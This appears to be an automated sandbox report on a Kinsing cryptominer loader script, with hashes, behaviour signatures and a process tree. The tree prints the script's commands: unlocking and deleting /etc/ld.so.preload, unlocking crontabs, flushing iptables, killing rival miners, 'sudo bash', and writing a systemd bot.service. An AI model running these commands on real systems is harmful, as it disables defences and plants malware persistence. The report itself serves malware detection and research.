Analysis
-
max time kernel
81s -
max time network
122s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/02/2025, 03:51
Static task
static1
Behavioral task
behavioral1
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
-
Size
564B
-
MD5
9329ab381df2adee0565f7b4aa4a7503
-
SHA1
94f01de282218339136c57ea31734fe045f42a69
-
SHA256
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253
-
SHA512
058729bf8b0195f03b19cd5025e69f3dbd22e088d9108103571a84870073b00c782ff9d35e82d9253bad266c93a5aae147807a08ca1d66a94fa8a0883a805156
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral4/files/fstream-34.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-33.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload bash -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1788 chmod 1789 chmod 1762 chmod 1764 chmod 1773 chmod 1775 chmod 1780 chmod 1782 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1790 bash -
Flushes firewall rules 1 TTPs 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 746 iptables 780 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 2 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 762 sudo 1510 sudo -
Attempts to change immutable files 53 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1548 xargs 1596 xargs 1674 sed 1689 sed 740 chattr 1569 xargs 1574 xargs 1664 xargs 1668 sed 1673 xargs 1691 xargs 1695 sed 775 chattr 1665 sed 1679 xargs 1686 sed 1692 sed 1717 xargs 1756 xargs 742 chattr 1589 xargs 1608 xargs 1670 xargs 1697 xargs 1700 xargs 778 chattr 1553 xargs 1579 xargs 1584 xargs 1632 xargs 1682 xargs 1729 xargs 1740 xargs 1558 xargs 1564 xargs 1620 xargs 1677 sed 1688 xargs 1712 xargs 732 chattr 1519 uname 1614 xargs 1667 xargs 1680 sed 1698 sed 1751 xargs 1601 xargs 1626 xargs 1671 sed 1676 xargs 1694 xargs 777 chattr 1543 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.9YbfN3 crontab File opened for modification /var/spool/cron/crontabs/tmp.umWlHh crontab File opened for modification /var/spool/cron/crontabs/tmp.vsMSeJ crontab File opened for modification /var/spool/cron/crontabs/tmp.LGosza crontab File opened for modification /var/spool/cron/crontabs/tmp.BA5z2q crontab File opened for modification /var/spool/cron/crontabs/tmp.npRLBB crontab File opened for modification /var/spool/cron/crontabs/tmp.JwfJbx crontab File opened for modification /var/spool/cron/crontabs/tmp.GTtTJv crontab File opened for modification /var/spool/cron/crontabs/tmp.daNr1Y crontab File opened for modification /var/spool/cron/crontabs/tmp.7MDEiQ crontab File opened for modification /var/spool/cron/crontabs/tmp.tulGUq crontab File opened for modification /var/spool/cron/crontabs/tmp.PH0Iae crontab File opened for modification /var/spool/cron/crontabs/tmp.cmOD1C crontab File opened for modification /var/spool/cron/crontabs/tmp.LJUXVY crontab File opened for modification /var/spool/cron/crontabs/tmp.EWCmUM crontab File opened for modification /var/spool/cron/crontabs/tmp.UDonJe crontab File opened for modification /var/spool/cron/crontabs/tmp.3QsdAV crontab File opened for modification /var/spool/cron/crontabs/tmp.owhRwW crontab File opened for modification /var/spool/cron/crontabs/tmp.aZ3INI crontab File opened for modification /var/spool/cron/crontabs/tmp.pQIaqe crontab File opened for modification /var/spool/cron/crontabs/tmp.yHrmkT crontab File opened for modification /var/spool/cron/crontabs/tmp.HInxmx crontab File opened for modification /var/spool/cron/crontabs/tmp.5sJRQw crontab File opened for modification /var/spool/cron/crontabs/tmp.v63vwY crontab File opened for modification /var/spool/cron/crontabs/tmp.2rLOZg crontab File opened for modification /var/spool/cron/crontabs/tmp.iQoy1l crontab File opened for modification /var/spool/cron/crontabs/tmp.5Cfjid crontab File opened for modification /var/spool/cron/crontabs/tmp.h9Npof crontab File opened for modification /var/spool/cron/crontabs/tmp.Fi79qd crontab File opened for modification /var/spool/cron/crontabs/tmp.CLHN2W crontab File opened for modification /var/spool/cron/crontabs/tmp.rOjIN4 crontab File opened for modification /var/spool/cron/crontabs/tmp.wMmsxy crontab File opened for modification /var/spool/cron/crontabs/tmp.HdIIBh crontab File opened for modification /var/spool/cron/crontabs/tmp.BMUWjR crontab File opened for modification /var/spool/cron/crontabs/tmp.x1Zick crontab File opened for modification /var/spool/cron/crontabs/tmp.atHvLC crontab File opened for modification /var/spool/cron/crontabs/tmp.oWEZ2D crontab File opened for modification /var/spool/cron/crontabs/tmp.2IztFJ crontab File opened for modification /var/spool/cron/crontabs/tmp.XqQGrN crontab File opened for modification /var/spool/cron/crontabs/tmp.dTFmOk crontab File opened for modification /var/spool/cron/crontabs/tmp.XTmf9e crontab File opened for modification /var/spool/cron/crontabs/tmp.Kzwrvy crontab File opened for modification /var/spool/cron/crontabs/tmp.9GOmHh crontab File opened for modification /var/spool/cron/crontabs/tmp.7UJZ2Z crontab File opened for modification /var/spool/cron/crontabs/tmp.ke1IFu crontab File opened for modification /var/spool/cron/crontabs/tmp.rg694h crontab File opened for modification /var/spool/cron/crontabs/tmp.t16Jeq crontab File opened for modification /var/spool/cron/crontabs/tmp.XrG0XL crontab File opened for modification /var/spool/cron/crontabs/tmp.2lFUqd crontab File opened for modification /var/spool/cron/crontabs/tmp.q1wJWJ crontab File opened for modification /var/spool/cron/crontabs/tmp.0MMAsk crontab File opened for modification /var/spool/cron/crontabs/tmp.JfiGPk crontab File opened for modification /var/spool/cron/crontabs/tmp.HdRa6e crontab File opened for modification /var/spool/cron/crontabs/tmp.MkSaD8 crontab File opened for modification /var/spool/cron/crontabs/tmp.IYLRj0 crontab File opened for modification /var/spool/cron/crontabs/tmp.8VH51W crontab File opened for modification /var/spool/cron/crontabs/tmp.cowcRO crontab File opened for modification /var/spool/cron/crontabs/tmp.ZR78Zd crontab File opened for modification /var/spool/cron/crontabs/tmp.ptvYVW crontab File opened for modification /var/spool/cron/crontabs/tmp.3bmBDh crontab File opened for modification /var/spool/cron/crontabs/tmp.tLe2qj crontab File opened for modification /var/spool/cron/crontabs/tmp.4D2BNC crontab File opened for modification /var/spool/cron/crontabs/tmp.kmuGpQ crontab File opened for modification /var/spool/cron/crontabs/tmp.quBXWh crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service bash -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1708 ps 1713 ps 1565 ps 1585 ps 1597 ps 1752 ps 1560 ps 1570 ps 1575 ps 1580 ps 1592 ps 1660 ps -
description ioc Process File opened for reading /proc/self/fd xargs File opened for reading /proc/721/status ps File opened for reading /proc/110/stat ps File opened for reading /proc/18/cmdline ps File opened for reading /proc/1600/stat ps File opened for reading /proc/773/cmdline pkill File opened for reading /proc/723/status ps File opened for reading /proc/5/cmdline pkill File opened for reading /proc/22 ls File opened for reading /proc/1535/cmdline pkill File opened for reading /proc/4/status pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/336/cmdline ps File opened for reading /proc/9/status pkill File opened for reading /proc/10/stat ps File opened for reading /proc/683/stat ps File opened for reading /proc/20/cmdline pkill File opened for reading /proc/23/cmdline pkill File opened for reading /proc/702/status ps File opened for reading /proc/723/status pkill File opened for reading /proc/76/cmdline ps File opened for reading /proc/14/status pkill File opened for reading /proc/685/status pkill File opened for reading /proc/6/cmdline ps File opened for reading /proc/15/stat ps File opened for reading /proc/22/status ps File opened for reading /proc/177/cmdline ps File opened for reading /proc/18/cmdline pkill File opened for reading /proc/5/cmdline pkill File opened for reading /proc/686/stat ps File opened for reading /proc/723/cmdline pkill File opened for reading /proc/24/status pkill File opened for reading /proc/70/cmdline pkill File opened for reading /proc/336/status pkill File opened for reading /proc/721/status ps File opened for reading /proc/773/cmdline ps File opened for reading /proc/12/cmdline pkill File opened for reading /proc/23/status pkill File opened for reading /proc/8/status ps File opened for reading /proc/724/cmdline pkill File opened for reading /proc/444/status ps File opened for reading /proc/11/stat ps File opened for reading /proc/12/stat ps File opened for reading /proc/75/cmdline pkill File opened for reading /proc/70/status pkill File opened for reading /proc/685/cmdline pkill File opened for reading /proc/1751/status ps File opened for reading /proc/11/stat ps File opened for reading /proc/37/cmdline ps File opened for reading /proc/149/status ps File opened for reading /proc/22/status ps File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems sed File opened for reading /proc/125/cmdline pkill File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/762/status pkill File opened for reading /proc/72/cmdline pkill File opened for reading /proc/22/status pkill File opened for reading /proc/2/status pkill File opened for reading /proc/tty/drivers ps File opened for reading /proc/71/cmdline pkill File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/254/stat ps File opened for reading /proc/686/status ps -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1465 ls 1892 sed
Processes
-
/tmp/ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh/tmp/ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh1⤵PID:727
-
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:732
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:738
-
-
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵
- Attempts to change immutable files
PID:740
-
-
/usr/bin/chattrchattr -i /etc/crontab2⤵
- Attempts to change immutable files
PID:742
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:746
-
-
/bin/sedsed /185.81.68.124/d2⤵PID:753
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:754
-
-
/usr/bin/crontabcrontab -l2⤵PID:752
-
-
/usr/bin/pkillpkill -f kinsing2⤵
- Reads CPU attributes
PID:756
-
-
/usr/bin/pkillpkill -f kdevtmpfsi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:758
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:760
-
-
/usr/bin/sudosudo bash2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:762 -
/usr/sbin/sendmailsendmail -t3⤵PID:769
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOYk-0000CP-8p4⤵
- Reads CPU attributes
PID:785
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:772
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOYk-0000CS-904⤵
- Reads CPU attributes
PID:786
-
-
-
/bin/bashbash3⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:773 -
/usr/bin/chattrchattr -i /etc/ld.so.preload4⤵
- Attempts to change immutable files
PID:775
-
-
/bin/rmrm -f /etc/ld.so.preload4⤵PID:776
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron4⤵
- Attempts to change immutable files
PID:777
-
-
/usr/bin/chattrchattr -ia /etc/crontab4⤵
- Attempts to change immutable files
PID:778
-
-
/sbin/iptablesiptables -F4⤵
- Flushes firewall rules
PID:780
-
-
/bin/grepgrep exe4⤵PID:783
-
-
/bin/lsls -latrh /proc/14⤵PID:782
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:788
-
-
/bin/lsls -latrh /proc/104⤵PID:790
-
-
/bin/grepgrep exe4⤵PID:791
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:793
-
-
/bin/grepgrep exe4⤵PID:796
-
-
/bin/lsls -latrh /proc/114⤵PID:795
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:800
-
-
/bin/grepgrep exe4⤵PID:803
-
-
/bin/lsls -latrh /proc/1104⤵PID:802
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:805
-
-
/bin/grepgrep exe4⤵PID:808
-
-
/bin/lsls -latrh /proc/124⤵PID:807
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:810
-
-
/bin/grepgrep exe4⤵PID:813
-
-
/bin/lsls -latrh /proc/1254⤵PID:812
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:815
-
-
/bin/grepgrep exe4⤵PID:818
-
-
/bin/lsls -latrh /proc/1264⤵PID:817
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:820
-
-
/bin/grepgrep exe4⤵PID:823
-
-
/bin/lsls -latrh /proc/134⤵PID:822
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:825
-
-
/bin/grepgrep exe4⤵PID:828
-
-
/bin/lsls -latrh /proc/144⤵PID:827
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:830
-
-
/bin/grepgrep exe4⤵PID:833
-
-
/bin/lsls -latrh /proc/1494⤵PID:832
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:835
-
-
/bin/grepgrep exe4⤵PID:838
-
-
/bin/lsls -latrh /proc/154⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:840
-
-
/bin/grepgrep exe4⤵PID:843
-
-
/bin/lsls -latrh /proc/164⤵PID:842
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:845
-
-
/bin/grepgrep exe4⤵PID:848
-
-
/bin/lsls -latrh /proc/1604⤵PID:847
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:850
-
-
/bin/grepgrep exe4⤵PID:853
-
-
/bin/lsls -latrh /proc/174⤵PID:852
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:855
-
-
/bin/grepgrep exe4⤵PID:858
-
-
/bin/lsls -latrh /proc/1764⤵PID:857
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:860
-
-
/bin/grepgrep exe4⤵PID:863
-
-
/bin/lsls -latrh /proc/1774⤵PID:862
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:865
-
-
/bin/grepgrep exe4⤵PID:868
-
-
/bin/lsls -latrh /proc/184⤵PID:867
-
-
